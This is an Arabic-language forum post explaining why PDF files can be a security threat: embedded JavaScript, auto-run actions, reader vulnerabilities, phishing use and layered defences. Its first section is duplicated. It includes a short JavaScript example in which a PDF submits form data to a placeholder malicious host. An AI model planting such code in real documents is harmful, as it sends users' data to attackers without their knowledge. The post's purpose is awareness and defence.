- بواسطة x32x01 ||
ليه ملف PDF ممكن يبقى خطر أمني؟ 
ناس كتير فاكرة إن ملف PDF مجرد ملف قراءة وخلاص، إنما في عالم الأمن السيبراني الموضوع مختلف تمامًا
الـ PDF في الحقيقة صيغة ذكية ومعقدة، وبتدخل كتير كـ Initial Access في هجمات اختراق حقيقية.
البنية الداخلية لملف PDF وليه تعتبر خطيرة
ملف PDF مش صورة ثابتة، ده تنسيق غني جدًا مبني على Objects و XRef Tables، وده بيخليه يقدر يحتوي على حاجات زي:
يعني إيه الكلام ده؟
يعني ملف PDF ممكن ينفذ منطق برمجي أول ما يتفتح أو المستخدم يضغط عليه.
مثال بسيط على JavaScript جوه PDF
الكود ده ممكن:
الخطر الحقيقي مش في PDF… في قارئ الـ PDF نفسه
ملف PDF لوحده مش بيخترق الجهاز إنما PDF Reader هو الـ Attack Surface الحقيقي 
أشهر البرامج اللي اتسجل فيها ثغرات:
النتيجة؟
استخدام PDF في هجمات التصيّد الحديثة
في هجمات زي:
سيناريوهات منتشرة:
ليه برامج الحماية ساعات مبتكشفش الهجوم؟
إزاي تحمي نفسك من هجمات PDF؟
على مستوى المستخدم
على مستوى النظام
على مستوى الشركات
الخلاصة الأمنية
ملف PDF مش مجرد ملف عرض ده حاوية تفاعلية ممكن تتحول لسلاح اختراق لو اجتمع:
قارئ ضعيف + مستخدم غير واعي + نظام مش متحدّث
ناس كتير فاكرة إن ملف PDF مجرد ملف قراءة وخلاص، إنما في عالم الأمن السيبراني الموضوع مختلف تمامًا
الـ PDF في الحقيقة صيغة ذكية ومعقدة، وبتدخل كتير كـ Initial Access في هجمات اختراق حقيقية.
البنية الداخلية لملف PDF وليه تعتبر خطيرة
ملف PDF مش صورة ثابتة، ده تنسيق غني جدًا مبني على Objects و XRef Tables، وده بيخليه يقدر يحتوي على حاجات زي:- JavaScript مدمج
- أوامر تلقائية زي /OpenAction
- تشغيل ملفات أو أوامر /Launch
- Interactive Forms (نماذج تفاعلية)
- Embedded Files ملفات مستخبية جوه الـ PDF
- روابط خارجية بتتفتح وقت التفاعل
يعني إيه الكلام ده؟يعني ملف PDF ممكن ينفذ منطق برمجي أول ما يتفتح أو المستخدم يضغط عليه.
مثال بسيط على JavaScript جوه PDF 
JavaScript:
app.alert("Welcome!");
this.submitForm({
cURL: "http://malicious-site.com",
cSubmitAs: "HTML"
});- يفتح نافذة
- يبعت بيانات
- أو يبدأ تفاعل المستخدم من غير ما يحس
الخطر الحقيقي مش في PDF… في قارئ الـ PDF نفسه 
ملف PDF لوحده مش بيخترق الجهاز إنما PDF Reader هو الـ Attack Surface الحقيقي أشهر البرامج اللي اتسجل فيها ثغرات:
- Adobe Acrobat Reader
- Foxit Reader
- قارئات PDF في المتصفحات
- Heap Overflow
- Use After Free
- Buffer Overflow
- أخطاء منطقية في JavaScript Engine
النتيجة؟- Remote Code Execution
- الهروب من الـ Sandbox
- تحميل Malware في الخلفية
- دخول مرحلة Post-Exploitation
استخدام PDF في هجمات التصيّد الحديثة 
في هجمات زي:- Spear Phishing
- BEC
- APT Campaigns
- شكله رسمي
- بيعدّي فلاتر الإيميل
- بيشجع المستخدم يفتحه
سيناريوهات منتشرة:- PDF فيه لينك تصيّد → سرقة بيانات
- PDF بيستغل ثغرة غير متقفلة → تشغيل Malware
- PDF فيه ملف EXE أو HTA → Dropper
ليه برامج الحماية ساعات مبتكشفش الهجوم؟ 
- الثغرة بتكون Zero-Day
- التنفيذ بيبقى In-Memory
- مفيش Malware واضح جوه الملف
- الاعتماد على تفاعل المستخدم مش استغلال مباشر
إزاي تحمي نفسك من هجمات PDF؟ 
على مستوى المستخدم 
- اقفل JavaScript في قارئ الـ PDF
- استخدم قارئات خفيفة
- متفتحش PDF من مصدر مش واثق فيه
على مستوى النظام 
- حدّث قارئ الـ PDF باستمرار
- فعّل ASR Rules
- امنع Child Processes من PDF Reader
على مستوى الشركات 
- فتح المرفقات جوه Sandbox
- تحليل Static و Dynamic للـ PDF
- استخدام CDR
- مراقبة السلوك بـ EDR
الخلاصة الأمنية 
ملف PDF مش مجرد ملف عرض ده حاوية تفاعلية ممكن تتحول لسلاح اختراق لو اجتمع:قارئ ضعيف + مستخدم غير واعي + نظام مش متحدّث